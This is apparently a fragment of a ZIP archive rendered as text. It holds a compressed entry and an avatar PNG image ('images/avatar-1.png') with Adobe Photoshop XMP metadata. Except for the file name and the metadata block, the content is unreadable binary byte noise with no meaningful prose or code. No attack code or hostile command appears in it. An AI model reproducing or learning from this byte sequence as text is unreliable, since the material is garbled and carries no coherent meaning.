YR����J)N4w ���zhr����p�X��#�(�c'���³����8�ƩQ���,re��^��C�CY)U�E�ӊ�OC'�/Һ��9Qn�j�C���C�%�5�����J5�4�fo��u�öi�U�TH�J��u�㸜�-�)D�B~��G�3��$ӭ6�"�oG�r��O�Y%�"�D'�R�P/�T�]�Gl7t���7�a���u	�F�U��D��?����$訓wU�Y�F����v8��V��_��~���Tˏˍk�Q�њ�ȟ�XO&��ɵE��Eпx�J�r���/�V�����	�Bsmֽ��1�E�/��cX�����G��!Mź/�����x��r��Y'$�#�o��Lot�5d���z�и��2z�h���A2AX�aw/���ڹ��A�t7˟A�B �:�4�є^H�X��l	l�T�L
L���h"ZE�hAhPP��hf����Nwۧ>��4���E�. k6��
�
H�(�� (�� �2>�7@R��e	ӯ�'��_�>���<�L~�I%/���q�z�p8�O�:�̪�C2�YQ7*�������d�����R�¡�C(�@�[{�V�� �4|u�GDjDR(��A.�gb����)m�m�TR�P��@*�P�@�|����I~��ӧBĭ
#)�����Tt6���¡X8��;x�yX��^��}�t��O�Kcz��W�ϗ1��+��\1�z;7�)�ҥ̶����6�y�"V�4VZD��Vj��4TZ�%eh���*F�
�V�#M E��f��4��N�YN�k�%Ck�1]���|�ʺ��ӓ�M��.�[����N�c1ӧ�Z1���?������_�Q�j�gD���W��2~^�y;_�3S�X�����;�.���KQ��E9�?�2��n/�Q���ܦ�i�T_z�w�\XpF	��ˬv��WN]x��~����Z�r���꿩<S�����C���W�*�7.G��H3ݟ�_ފ�Y�\��z/�f�����<����#S����jby~��ae��⫭�w������Ԏg�e�R�����2����?q��^<�"�?��c�媳 �#�u�O
��ҠL�~�ө�7��P1���+	����y=��~�+o�|�$�WDT�?Ϊ��V�ݯ��ZݑQ(��s"��)�m}m���u�2y_�ĵf��O+�J<�1�f.1���t�2_��V���2��%���O��OQ�SԾ�?�|ߎ�5�2��Tc��޾���m�?[I}̟��i/���W�O+��5��G��o�o�FC��5@^%��h
��U.�����.*����[w*;ر�˔�o�_����K�����j�Z���5^�<���V%]�R�KP�7���B�[���q����{�O���n2K௺P�&��<:�P���s$k٩CS��=�G�~պX)O��t�f��Û�F��S�Do��޾d��œ��
�ܶ�ґ�O����i�G^7����6�y'��3mKg�x0�:X2n�YQ��9�l�k��X�3z� .�XFD
AXȊ���>�5��Z��ƦF���,t�L��,@�@��h
z�A����S@��5R�Uܪ.\	` 	���PK�8FZ�QU�j�jimages/avatar-1.pngnu�[����PNG


IHDRuup��tEXtSoftwareAdobe ImageReadyq�e<�iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:01801174072068118DBB8F711C24FFAB" xmpMM:DocumentID="xmp.did:DC9C5C40DDFF11EA9BBCCFA750770BE0" xmpMM:InstanceID="xmp.iid:DC9C5C3FDDFF11EA9BBCCFA750770BE0" xmp:CreatorTool="Adobe Photoshop CC 2018 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3103a096-de18-5c4c-9991-05ec876bfece" stRef:documentID="adobe:docid:photoshop:fff8ae06-d55a-aa4b-aec7-cb339c96d99b"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��a�f�IDATxڤ��d�u&�Ωt+ܺ9v�4
4QH�@HB�r��r�hK�����f��'��<Ool�'ؖ��d˲�,Y�B	(���ý�o�s���}�NսM#��U�©s��k�e�OI��z��=������o���5�YG���k�=:��w�S�o�����L��1�c��T���&NUr)�
��|�.�h��}��x����<�S�=����F$��QpD�ߎ���'>�ZM�催��ʓϟ�/>�m��w�}��@FFF%��H,�V�%�jY�\����>�]y��E9�w�����d��=24<"�TF�HT�o���*�����ۋ
ڿEC����l�0!�_w��aR��~� o�ބ�߀���@���8W?��ϼ�v�쐠8���_�}�y�s�+�~�u�	k��������bw~�=�u$��D\G?�܈"bS�|=��s��Ğ/8�簟3�}O\{o�:D���޿wZ�~.���\��R��v{nr�g>�L�GGGI����w�x�]8���7��!�����}?t-Xُ���o�Ǘ2��񾆏~?��x]N
�Qn�+���G�鵹J$��bD"$8-�É���]��$�2���H4���D\��u�{3��{V޻�ȼֿ�ش����:�����wC�k���8ۏE|�Gx�/!��Mh8V"t	���Dw�!;�*!��<q������
z�ᜟ�[���'��Kdq���
6�'�N���p�c_��<��x|��">�J�uͦs�߳ �T��k ��8v�$��%l����~�o���8�7�{c���?�R��_�n/t.߷Ds�b7�"���y����p�v1����ߏޏ�A;�W��q�	6�ӑ����H ����uu	��X�vU4��n�9�:�12α?�:a�2�
09��	z5���6�}�z<~Xu����7�´.�����=<r�c�!�d�4��h,��C	�"�]���N���β[}�|�!���I��/�W�Q�"[�w�ʺF���s�ٺ�,������/'L`��KTn�+��%�YT7tDz~�KL�"8� �mx��p�w���n�P��S+�ӣѨ.�݆�H$$���l�$�z�L�tWs<7
�mԃ��<mE��h+jIH�y3�}�y���0f%�r����F7�>�:;��Ng�uķk��ݬfM���A��-�>����kr�k�3�㜿��?l�tz8>�w`��G� d"��ђV�����e�����o<*�������,���p��K�ٔv��� ����(q���wK��Z]%��_��x�鎮
�d�D���NW.�$�ۑ�Ev�H�~�Q��*�@gvwf9�Ev�J��
��o�����3L�m�;�7��K$�2�J�Y�dq�\�r�-��H���~m��]�ه����]��O�(�<�]�35)w�rRn?y�da�eF��\*H�ݔ�l�z���:j�zF���H�]#-��:��2��E,ۋ]n4�3 H ~�	��	�b'�����2���.n/m���`�{;ʭ��ÿ��{��dX��~���9�z�@"GƤU�ə3/˥�+���9=���l�`/V+2@1��U�-����(�t*%��7���g�0���=p@��;����[�}�Cv�=�y�%�Uk]'����
�]t�QvTO��x���;»��U�r��!R��
:���;"�O�up��[���]���4��
ٯ��;��W3����ǻz�Cg��]4J�Bf%J�
�xM�|�ŧ>!O=���KU�*���239-�JYj�,�n�єz�.�CY}?_(��ꪤ��N���9}�
��%���~&�ߋ��Ҳ�w�нI9x�LL�J�X'��m���%p;�B󪪇��7x��_|ܱk�)t�޽��k�:]�kF�CF7������Ƴ��q~'_����@T;�c��.��΍�ӆ�r����R��ڔ�Ξ�gΜ��|A&!NG�C�Z.�y ��j��2��I	�X�h�H6�WJ2T�С��RI�
4�������<��iy��$q�#o}�<pߛ$�H�%$O*7�w;أo[^3����so<��~|Pݒ�5kC��Y��N�qBR��89�.���r��_�eثc{�;s)������N`���nu�����O<,���&�z�5( f�������bQ*�C��R�*�V[�,J@<O�� ���+ "���m�\�H�V��ap5?���e�� '�p
�z�Q��c�C
��O�؏��Gd���87�.쮌�o��6�l�fů��q��/��wG�ujH�n������M-��5?l�h7l��|
0D�����m�䐸��a$�N�8��_�;�����,ler|B�-_m��tFE��憞���Ϋ@����):� n�h] a��q�V�����ؘ�q}�k�291!qH�h�����
1�ȗ+��o���
Y���=+�~�ˁC��V>'>6�X�?����l�~�s����x��x|��l�N��K�>/�#!���_t����h�������s8��c�C��'1�����\[�/>�|��OI�ܔ{vI�X'NML�"�E����˚R�� �x}sS���Z��E�,K��I��$~�•��Ke���PS����yx䶋A^^^����GF�_:$��k�lK�l҈�~ C���UO��W��}x�;�К�!tۅ4~�7�?���/R�u�u������O����ވ>�HC���O~T>��/�K����I�W�8$�}$~`��`&��1�J��x4"Ġ����xr�(%�n"l���
Р8�d��u�|.'�vK�?�#֎@�oBZ�a���8L�My�[�����W)@��6�2:��m���'����`¯I�@���
c�~�fu^��e� #���x�S���ۑ�;8�c�T̕O~�A���?��+�2::.�i��FbvK�f4��
y�a���\2ɤ��2$"E(�i��klc����Q��MB.���D��XB���,�,Cc1�H���4�n��ˇ�&��ʋ�=%��dq���<x�5�v���j�'`�.�������N�g�������;�x{��#۸�G�"D�
��@��:�m�ÏB�F�e�a�:��A�
)䯨���N%HJ������U�G�t,��ں��ף>�u�5�ײ��q�n���x��!�b h���^QNM�t�*x�� ����|I~�L����#GO�F6���Q*#�*���w3�����-�m�~%�[c?����s�C�HH�^Ռ�a,�G-��Q,��N�o��2�����g�;��::�\G��	�H��H�u��)p�� �����W�5�(���c�\R�����E����Y���}p*7C| ���P[����I.'��7�0��;�r����lF9�"~�S��~a�D2��}'$&�W�_b�٦�~��O~���;:��TN��qz��Xܵu��x�C���;�玲hhϳ�YiT����o�_}�K&�?	���.[�oU,b�C�<7AD�Z�����
�d�A���ȉ�<��	��v%7��yCt<`�ے"��M�`���$
|���Nsr0%B
�� ~��P	+@��#�@ҧΜ�ǿ�-Τ��;����Nh)��o=f!'NW7��x��-���yg�6�?�����͝~���~�FΝL�	1��F%'���g_�wjt���ŵ55AD�cK+��^kbzvj����>(������ @DI�s�ٴLed��86��,��gK�-�mnm�y��k4��FǤ	�2S�b�w>�T������5@��~���ܩ�d$�T�z�W/�kջ��K��|�	h�o��8�JѰ�wЬ�����x��$��1�s*�v"���J�5��?&�y�1،�QpQ��.>r
m�8+	�Hƣ2=4(S� (�Yf4�Q�Ap�2��(L�8G:�+�*CO��G@�>7��J��J���c��L*%遘�@����	 �j]�D�n���x�h��=l+�����?��u'nŽ�}�b�6�A�~�:Le����e<��#}z��v������f����G>�v_+K��-�*�?}�9��7��M؈Ã�*���Y]_Sq�D\55F�*'@�T<!#ங�=9>��d�p�
�S���b5�ƌI@��y�S}����H�pn4!C���*5�������@\C��g�cHo=4��+�w�AHO��,ͦ����.�:2���l������}�S`�Y�.�u,������^/@vj8���X�W������]�f�^-6�%H�_×�)���a�L���ran^��U�a�+9�0Ige�6~h�s�rvtTM�$��E�J�V�$^�hʑ&8q8��j��������q踨M��=2}��ݟ�`zT��x�;6,նI�r��ޘ�ђ�q��q|��̸,�j���_lR�L��c��D�9�qbZM���J?��uԓ�59}Y�0���i�hW���e��B?����9y�����/v���=i���b'�����3��{B�
�u��źЋ���Y�36���;��x0�V0��N�@�Z
 �.|ˊ3��/_�Τ�+�;�-]D�%�:�m���&I�U�hOX��H	l�W��71&#[���T!�O�N���9Y��醛�o�C_����wP�i�A��m.�/C�w:i�W7���x��x�g��� �6������O��3�q�
gI�\����piY�E4[H�,^�\���?>*��V�S�7��
�뀎x��:f���&ȡQ�-34�N��|r8��(Q'� �\a�i4�6jr�b�8_���R�)1��[Œr�V*٭RY�P'�(�z��������u��8ݜݐ$��.���]��g��|��ʧC�m
��bgCt"��c�8��(�USt��?zn�)a���y���9�= *�.�u���U\8��j�v�olS�/4GhK��ʉ4QZ�x�Q7H�6҄�/��<��&[�WT͜�v�:20��l��>į;`��f`m�j���14��� ur��Hl��Wg&���h惵��n�Z7������a��|�;Q�ð�^=��Ea:g�	��xN%
8�U�ʩO�5�T�^����,�Z�t�˷�d�}�i�(�\H�����(�!�Q<���.۾A���ލ�2�x��ϓ�A�L�v�UΜ���FK�C��:b���S�%��⽤z�f���
�������\�rY�G�)�h���'N'�ٵقAn��C������������?�c��7č�>�������
jK��9*b�,ȕ�eRљ2��|����ڟ�m� ��0�I�ۀ8���k��� M��\�q��;[����F����M�oY��[��X�J_m��EN�K�t���)]�MG�#c��k�ﺙ)��l�����|�3����������q:I��J��&��̇~ ���z��Fi\�j��.����)z-��P�%9���AU%��_��Gd�Š(qG����k���r)�NK	穫��:<��G��[�8!7i�!��rq�l�B�*d����AFw4Ȑ�)5�`�_�����l1Fz�i=hERrݞi9�gFJ0��\ZZ�Ͼdn/����^퍕8v�"?"��j��� �C	�Q��{[��:|�_����� ��ƚ�m�kJH7Jb��Y�H3�E�(~U�,s��r7�t�ymQޢ]/�צ�$I��X�����;�2�,��b��2%��Ne��t�
�AQ1�7�
<35 ��P�y�4�=��pE�K*V���?����d����������W��&iOz���Ig6uq��:���_5Q[���K�_��
��x'�z|(+�&�elhP���b��S#‹��Ok��{V�eP��Q&���jM�I@l>�0�!�ե�
�1e�ܚ�tvH�t�Gc	%tbv` -I��6�`*�6o���4�k�î��vsǬ�p���)3"��e }����>�R�ܮ\�K�V?r��Ӿ,��ٵ�&���5u�9��d�h6��:##�"�4D�
�hoںO��nH��IV��)�hQܑ��XXW��w�ن��)H��8D�Ac��p
��h��a������C7,m�hxdD&��
ޞz�9�_���I�L�pz���=�W��c�z?�8~!\G�4�N�N~��_%��C�c@;ԧ�aG�@w���ɱ��~�N�=���D�΋�Ҷh��T�JP�骹�I�vLxM
p[��T3¸䈜i��0�N/S<��N�G�
oV�������qs����
�G�[t���9?� ��,��&��S�lHw�Ƀ��F6`\�6;v���v{��Ws�ma�ߕ}Ի��v��
p{�&�ᕍ�-�邘{���2>I!J}�)&X�86�G&gS����i)^p���5^��!7d���n�������[��5$�Q��pS�N4��P�	�*6���4�,d�~^�d
�����u�k�L����T�zݜhǘbuH-i5GZ��϶���n7�ؼnWz�:�������q�R�`Ѧz
����@��kjR�D�7���yB� p�!5\��3e��p���ڶ��N(�+��CU��6�@)��/Q�LԱT�˃ �VtG"�.T��!P���}]�BQ��KBD�37y���_w]�m�P�Ẑ��l�*c�������$�!�9�n.o'x��';������ہQ(K�VW�cУi�l��X)�bPd��bOu�Չ���D#v��A�ܶ7����I�Y�x~�Fm��/E���ǘ���r�D>Fb���5���B3ߨW�۵�UP�ΰ��P6+q|nye�&(83�}U��xk�j�`&�����J>���x�C�����b���u���ۙ��s'z��{�y5�#��:�0Ï��5�t�sCd`

k��v,��"�ja��w�䱯�چ�Aa��Ϸ+����f�=S�O#4����3b��V�i�ڞ�W;����#{tt0�C��X�������3�*�p��y�NPܷD
@PO��{���[��{���X��z-j�{�S�CP��Sr`���PD%���?�Բ,4�=	@�8n��VE�!��_�����*�gE#��`���n~w2	��t�T"{&l憲�C����{6��u/�N�.�j�!f0� m�~-Ou�iY��z�
� ���I�uB���Ĉ�rHG�L�
H|_8Ǹ?E�^>y�,|g[R̎�Cf���=z�
7��ט�@���X���݅��53c��j�epdT^��7�%��`�z�b�FY|S̋��4 Gt>7n�Hg�(�2`�u8m%V���ߒr�T7���f%FlE�z�Z
u	Aʰ^��	�'c��N�
����J(h�������t���-�^�&ʁ+�F?��� �{����6S���*6�j|m}M�	�!XUן�|�ʤ/�P���=�J������Ώk�H�S�K�H�e�J8���x=j=:NP��^ G�$J�vpH�Q+i2�c�(ŝ<?$HS�\�xE��ruj���F�,�8��x�)ҷ;t�!J���!kA���9Ɯ
���� xۻ)�ٟ�{��\%��o����g[i�Յ�-�a�b��S0�� �%��z��,�Y�)�5��H�Y�>�"*�ĥ�5�#_�-�B��}?�;��Z���n
�D���R�`Qe[c�j#�����
��d�Ц܏�3�i�ذ,�l#XѢ+l��2喇����)d~��Do�����
kZ�=!"b:�l�p��	��_�n{�����k�2i��E������$��HvH]t��j0�!M�k)W-n�e@k�T��bU��%����VQ��U)5�6��8"���JD5��-]N��_�V�ݨ�1ڮ�U-H�u�Eq��,�����"�����x�����t)�3˂�r���{�*�رL�����~����&�5驎�ȷ�������ng;�#��X�����f0�ťUɂ���ߣ~V��Z�:� \p^�b#-nm�w^� ��6��q��̾JU	D�'�E��y��8�<�I�h2f�-c�zV��~�p�Qa�+W�`˅�,��R��	�xp�.l*G.�}E�쪫+2W���]�,i|/}[�8-u\҇%)l�*D��̠�775�j��Yգ4��vy
ʺ�!��u/���3��<�|�]���վ���vU}v��c>ҫ5�����/�#���(5���Z�i��"i.�C�>}�E��8[���\��M�d�EQ`I�yì�8��M��Q�0�Np.��Q�d�:����\K�ņ�A6
eY�yU������˲{q�6*u|������R�2�~��
���ni �9ó��rnyUE���il�V�mO��ް�i��4^L��{cu�%�b���ާK�ֹ/(������v����;WQ$jJARRV����W.i�-�E}�&�@BEXY��������h=��K��3�0G�q��O���pCl��]���n@G�}~�#�х�H������]��6ID21W����(O�����L�����Q�[y�s�����"3i�D�%V�;&�791��|�?T��5�l)�j���b=B^[݀��Lh�M)�@�B�Q�-Ͱ4�A�_�@u��
5��9d���N���QL
B��?�g���$����3_���a*=tP�D��B�PQn<<;��5��.��%�RĔE��-�^l{�T���=@���wv���u�A�B�6s��3���!��R�&����]Q�N�{N��DzDa`?>$�. �3��jO�A���+���=y��0�[d�u�ut���hY�_Sb8�1�k�G
ݴm����Ys�Ԛ F��N�%�q����A���W���:�w��n�UF���p���ů~I~��З�$'o�I�ا��"88.�DL�M	7�pL��3�"t����ȍ(�W��ի��J-�54�3�q�
��-ffߥl��*�s�*1�J�L'd8�2��Ā'�2�{V�Й���\ZZ�꺘��_Z��=��<�܋�#o�Gn���e��o�:=���1�>��%Q�<6;�wM�;�n���f6(hB��<���d7ǹ5\t|�k�r�����t	�3vZ��p�Ay���3_����[�"�}�{�o��+y�3��0���+4�>� R��[�-I�*�Z[Դhxb"!@��j�4�`�es~Y\o��۾d�q�
�F��֪��ͺ�vp}K`+�P��n�\�.W�J��H���9Դ��:���+�Mu�_\X�5�\w�tL�~��Ҋ�d��Y��Ƽ�j����-�p����2��Vۈ`���ԝ�q�7:��Q1� A�eijZV�[OJ?Q�E��ޝįV�A�L|���[O<.3�H?��'�)o��vu��=xT~�}?+���+sW�d\\g�lh�0�r��yy�q(�c�9�QoK�^��œ!S�� V7>��5�$ױ\v/�*̣��%ͼ�a�԰I�@�E!כ����2�E:2;	��Y �9�(�c,�Q/��I����iy�Jni^���U�~�F����tP����%���6���j�4�n�mSΩ�o���0-��y4 ��ʡ�V��3O=*��JƁDN?#g�$��Ǿ�����P�����^<��z����f^�k23;-��Q;pukKr(���AQS�wɤԙ����;�>w�ʭ�'K�C�Z��*�!~�Ґ�6�lY�]��vp�ȹ\4��Mw�fe\�o�n��[^�3��p�=��	�� /.�ʹ��"SIm  =4"��ה3O|E��ޛ�h3SLB�g�&���N��t�J��C߷��v�)��X[�?�����������Z+�G�mne^}�����9}79$�ò���?���?�LJR��c��qv��r���$;�zvvdT�x�yeaA݉�V�6���Z��y,l�Z�.L ��yL��K��R����e�!@L���0_n=~X�N���Ɔ�����/i f�Ąrʕ8+U�����i
���Y†�-{�����g^�"T���3ve�\ݐo�x^r�������)�a�-Q�P6aO������by�ʾ׋������'6�~׶�IŭWq�l{�c:��Siy��o˃���|��Y�Z2	����;�\���U�t��J����`�읙��o9)5\8�<��3K�r�����;�(�П�����E��+@�X�L���p���@����>�r�'w�Ů�73%�o8&�{��M	Y�.�nj�E"=([P�gV6��F^�H�TV:uF�q�m*9b_��Cg�Q�8~��UQ�
���~���/��w_{L6�Ω��)[$�ջ���F���;�Iƾ��� D�V9�D�Z���%�IP�Cu���t���z�Y5�g�2С�a���KDk��lV���'��es���~�C/�M�h^�C�xyA ��g�/�����>�<*bǻ����o�����ܶ)�j������W;|v.c�Գ�<�[�v�u��yݾ]219�
�(����{�7�^���t�Zղ����?�%?�ַ�7�~^��pY2@�t	���۳KKD�ZCN�r��{�Q9x�r|����6
�����H��F�v�����!�N��`C���00��F	�6�����);&�u7A�u2M�
�����Y����܂M����7'Bd������dL���7�9V…�इ��ܰ{FƠ�~���6����pGT\�$�+_����)���1Q�z�P�إ}��Ԙ�.Q�;|P�t�����&.z�������D� �NU����)c�����/�Ǐi�/��7 �L
zV�F�5�s�M7�o��B��PwC=~�S.M�n���͡���*�N���g�Xw�g�(�i�X���$}m�J�����=��$cZ��v��*c�M��
SY`#B7j/A��V�r=D�7N�H1��X6�阴)�<;1�u�Ν�=#C�cb��?�	uBT$3x����$a�$�Ne**��3/�f$
N_/פ	��52�W�]inQ�G�'U��ydiQ���r�֣VjM�߀��?+'쑅�-l��ɷ�'�_��Ҝ\w�
�ER���0[�T�Ɩb�m���#V��A�+��}/�O�o܂�Z�=�J�����tM��r��H��0��d�jf���@����ls����r�[���b�TlSҀ�X΁��(5Z��ueEkYi��kⅉj�Z[�K��h7�@�(��tf��>�\
���+�� tjKJ�Wd����4�b�06_kT��M��ؽ5���v��=>��n��= � �Ǎ�2��w�M������C��O}VZO�H��U�!c��{p��z��~5��Uq�����4��_�bʏ&�5T�V*�DD�\�D�6�u�Gt�0��{et�e"����4�?�=;9�qJ���	�c��+���u�U�-�&V�Š�� L#a"��`���@�M��$Љ�������.��V��������z<#&;>%Gq�z�9�[ߔ��a�۫����6Y�~|$��@�)��}��FY����6^">T��ve:4:�K��2{�r�!���:�K_���˿�8s�`�^�њ@&_K���h�,�?��۹�*�X�c�G9?W�:|��r��L�U��+0||v���I�Q{;[%��`�^�G	b�\jV=ݬkwqNh
�Ĵ��7�@�5��-��s��|`4���Ĕ���2
�sl
�&uZ�|nYjnLn8~�6���Ƀ�Գ��.0�F3��6Z�/�.��8�V�/^:/�e7���d����dni]Fc�2������.I��Ja��ȳ��	g8�[��cG��8p�z��r&��$"��T��� ��n���*r������ˠ��3�a?z���)��ga��q��E��)�gj�H�4�`��
����󬦏��=i6�y=�bt���
��

i��z����̉e�F
::1���.ʾ�!
Xs� ֮�!y��7�#�?"�z���}��̬�/��u�2�^MDpDb�)�*$"�fEQ+u8kT�fc�+���v�M*Q��Σ��}��;�׿㇤\*���иm�:ǿc�	E��F�L˦�xƿ;U0���,�&c(`R�İn.�؁ڎ\�N���p�4í7�r�,�;
$��"�%��_M'�	���H��в\���n�N���G�^2tIе���ng�B��ƫ�EI-~`����,7^\�t�l]��
��As
�H�9Ἔ������o��:����֛ds񲬯���<:<�jZL�zʴ���֍4:1-c3{e`p6�����Ƀ{5��]M�b���28�K��m�|�V�fd�U+Ȧ�M��[p�J<���V�bħwj,;�f]2�R��h�p�kOSh󡖠})��1;�;�����&�f$=<�e��=(u�`G=�is����,���N�o�>+�ЄL�d`R�V*��V�ѩ�
�������.^��V6�o}K�y�P��M�2�Ԫ�Y,�o�Cf�������]o�~���D%��i�Ծd�t({iiE{�3Fʶ�wM��~��_�����U��5���{�z���J�w�����Y
4��Z�Ѵ��$��f<�lȄ�x�5H��O(~`Yʀ&��u�@�>�T,'Si:e�?���AtW�e�A��
��2��*7=&�y���]��/!��,`��	,+� ���ʯ�ϡO'�{� ��[i�gl/$�"���{Y�@��ء��򉇾"����KDQ@�4S_$
6d�3�[j矑���d��1ٳgPuC�[yu<��)��1x^���T�I�����������ď�wܬ�µ��Ma#3�:�k��@��z�����5�V�1��9��c�X���&I�����;��q7(~7��5
riz�K�z�-،>����}P�9{^����r�"W6�4�o2� �kuRo����~�v9���~I�/30
�نn|PFX�4]Y�A�	��t�Dݙ����ey�	��Ò!*5��=1�5�U�Iˉ��
w��B����F><8
�BB�0�`�Pc�V�%grEy����\\�"o��+��t�r�@Q\y	Rezϸ�9|(�&��;m;Fa�}�5f��ZfP��V�i�AS�~5����l��L&�+#6^ݧ"7��Zo�Rg�7�*��W���(y�����������{��)tP��zcD���NH"G�����Q��<��i9w�!	��J��X���bnuCJ���29,�vW���SI����҄n�1�dZ/Tab9�K?�&y�҂|�윬�F�aO�+	�S�<4�����u����$ٔ�L�2��V|%6�2
�Rc�2��F�$��Z��٬�M��>[�0q���$ɵu~*�͚#��V�>��P������pц&�Ȣ����~��5r!��[':A����k��T
���&�԰V���ȟ#�&�3�cj�6�����L�s��[����ZW3��7(�hv0���NBl�Ѩ�r��4�w �#�~��)+Ŝ@^H.>$���6�'�|L>�����|HV �ٸ9��6��ȭ�'���On��>���Ey~�h��TV�-d�	����T��LF/t�{lp�jǷa:"vm|I���u.@S��lL],3�ن(�������4$0�̍���IT��84o�k�=�o�����J%ٷ��\y~R.�,I<��"�煅E�ћN��av�f)���t:���j�0�
��'b�v��PS�ֽ3�?�ڴ�S���t4���`��	��l1A��26��]{���v��؄D[y\{K���NAdz?�#ǠC���ߒg�y�4�X�|�����O�ӧ��F��]��t�Q��kv.&������"[ᒨ����V�f�u����>Rl��z�|[o��~��;��ND�V5�
q�iv��,��(�
�5tysKSX�C��X��v�f�#�v�6���c&$� VW˸�ZS�,����䴀0�5L%��3�
[�%cR�c�m������% �2̍G�� �J^L^w�: �-���0�w��Һ@ɊO�5Q�m:���Al��ٽB��T/��8e*+�탘eH�I��T��HZ��2u�,��M��0��eSDŦ��ZȄ�Q��
�_s��Nhx'ήb��{䕋��W>]aw*>Ƕ���E3�>J�m�'�ƣB�d��κVv�m��;{9_�O~�����w�Cmٴ&Z��i�@��� a�Kq��\����Ͻ,����Cr�uGd�舤���g��Յ+0m��,�ne�j*;�Ii�i�0�q�����Af���
g�)�Lʊf��ˤ��i�,�>Ѩ9b�>6x�?�(����{��5����^��~%L�����5ff��?�/����_�	Փ����a�E���A��46��0l�)n�ڷ��O0��7I��٭�&e_�9r`�h�h'�� ��Z \�ں$!�x���������v���A����J@����[/�W��wt�.�v��	1�d�R�%�Zɗe~mC��o�Kb�A)nlv��A���߶��1A�<Q��l���i�S���Z����6�0����\�g���C3
��aW��
���'n�={���cy�\՝G���[dC,~�P=f�,�A�|2�Bc\��0}����F��8̟���3��rau]n�����73l*�Tl���.y�}�4���SϪ=<�L��vY��dXm �D��e�j�l�"�<�uH�Α��f�4.jf
�Z��T<Z���
Ƀ2̈�Fcz%zZ@��5;�%T�����dF1�JǠ3�)z�r�A|�;���L�sx�>��1y�k���KsjTOd3df�!m����|�m}	�'5n��Z�ABɤ5c�Q�W�;հ�BI�:Vq���ܼkL�C쾲U�gV�Rwͬ����q&b�������"��Fe	�)����i\M����R���B��T���V`ǚdž�5兺s{^��8 ��t����u���ܔqvB��� ��?�ƂѤ����W�Eh?ԘB;�@����,��J
��x���6�� �+`�م,��(�gA� ��FD�^��MC,2�̉;��Uqzr9p{C_o�1����g�Ӟ��$󹒊��+26<,'vϨ��lաԀ	2�{l���"[�8+�G�\̛��>�k�bW�4�<j����T���>��M��*�h,�I�����-9��`;�o��:s�Ո�j���m;��ALϱ
���dq}SCct�u
�����h���,V�ƿ����-l"9��S��!N9}But��w��g�\2�A��ąE���@�'f'$���{vˁ����Rg�S������3��:��	4]�ѱq،��Ec�o��f�6��L'Pp�S3�:N'.�t����

�uB�n�a��+�F;U :O��J}c��8~�{���1��˙�r���G����g>�A�Kێ�u�myl��.>"C��U� �z��ў�Vi��IDM�+]n��L&d(nb��Q�{��98 �����c�Kv|Z[�Щ~���魗s2��$_?sI^�T��Z�lK�}���4"@�׶��q�3nlrlLf�fT���=S|�j��*��ε��n�u��&��C���`���E��ء}ݡ�S8V_�c��
��v�'�8(i�/�}:D\W��Ew
i�����^}�4K/��֚h0&K��Y��P}�
6�0W(��y�;U�m�9la|vV�-�v`?������K9��d,�i���tl���'k���z��n�(���y�"�m�N��I�6����@��a��0+5������Ç��aN�}'y�?������gcF?���Θ�g��K�4�i��Ŭ��K��Ϡ�^P��?$�g�ԩq�
L].C$j�H��%�j�=-^�>=	1˪����z��0^�I��⊼��I��$,�wפ�ԗE��D�U����mfvܿO3:�v��1����c�|��Q6����PC��r;�\-�roo=iG�lk���8޷S@<l���w��N��U������J�=b���͒7 f��fd�u� NU;sۖ9���e.�+����yEǃ�)i@d3��ާ<�m6�Pb�ʺ	n�5){��2	��-î�����o�3]��'ՙ��gX��B��:��������e�T�z���3�>�\�ۯ�((r�C]A���l�7j�����&�ڜ˶4p��*NH���2��Aߔ�K_%���E0�ɿ�N}��j��Թm���5[��(F���̇Mp92�0��v�XLOF��:�@���\�_���xT����I	fI���۔��}A�y�[$���#������w�ӆXX�]w�A�k+���Y�%�r���e��K���bg981*#�0����|E.l`�Vu�	9�Y��pdQ�h�g'�+�Z9�[��P4�8�E�(�򈝎�?xа#�֠o���i����V����J����^��T{�?�"�l4V��<~�<���j�F�L�l�a���4�aρ>bJ�Ɔ2:A*�E,b��������7�#�o�I�`��aY�;/��7�,)vQˌH�n=r:ە�Y�+��#��˲��e)_��~��⤳RĹ?���J���%U[X\n�e�\ӒFr���+�x��P���q����j|�1j��6.M7���?����
#�Hg]�A��x��s�_����7�t��h��_�-�\{*�Էɬ��U�(_���ޥ��8z��WҀN[�\�d�"n�u�n���̆�Ic�M�����
b�dd|�f�����]Ү�4�?=>#�كfR�ꚜ��g�{4����$��cg�%�]3�R����.E�Qke��5l��:]�L}�m��t�+~�%�q8ŧ&%��2m�Ü#��X��v�둈�����F��?fM�*͈�s����{y�?�5��x�--K�&��mD�1Mm��8� ީ�%��`L3]m�0\∖=���n}nY��������̑C����� $}���.�č�G�)']x�9����T�X��L\wR�8g藾����2
1N���$帜[ސ9��t�X��>���3v��� ������u}�Ld���cq�;D��+��X݆�m��O�Nb�늲S�GL]���.���&���J�ג�d�ө]oE䦛n��7����G��m�Ŏ���f��F�`�h�d����]*��%'�)sx�љi�;3#{fw��򢬾�_�,.��r�o���X%��"���6�mlj��ޛo���'$󦽵���7[
�huk~!5^\\�N-ʾ�a3!���X�6�����n�Y�Y��s�{Ǹ���7
��>�j� Qۮ���u|�y�Nt�6v�؇q��`VP��;%�ᑎ��8N����G�zZ�v�ͷ	����Γ��T�DbN4h��J��g���1��l�����Հް�<�g�=q���xF^>�mT�$�
N�ǒ�RZ/���iث0?�y�T�yi�:����fTT�M�ȸ���a�K@���^m�� l�D;�֛N�0tw�X����m�#謖��6��]��a�$�i5�]�m?�`�sT�r̃N�}�vl�P�k���G���k����4��0��Yt$&�E14W��
��/�/i��C��!�J��H�Q����$��!Ccc�����p���E.��r,鏲�;%j5�r��d��i�U��<�&cөAM6��&O_\��"�Hf��(`�_!��sh���+o㽚{���y�����'�k�ڛ#̝R��Fm�&�"8��O�N�2���Q��_���ݎyc��h��m6f����������k�� ��
�Ѝ�M�zTڀt&�q)�s
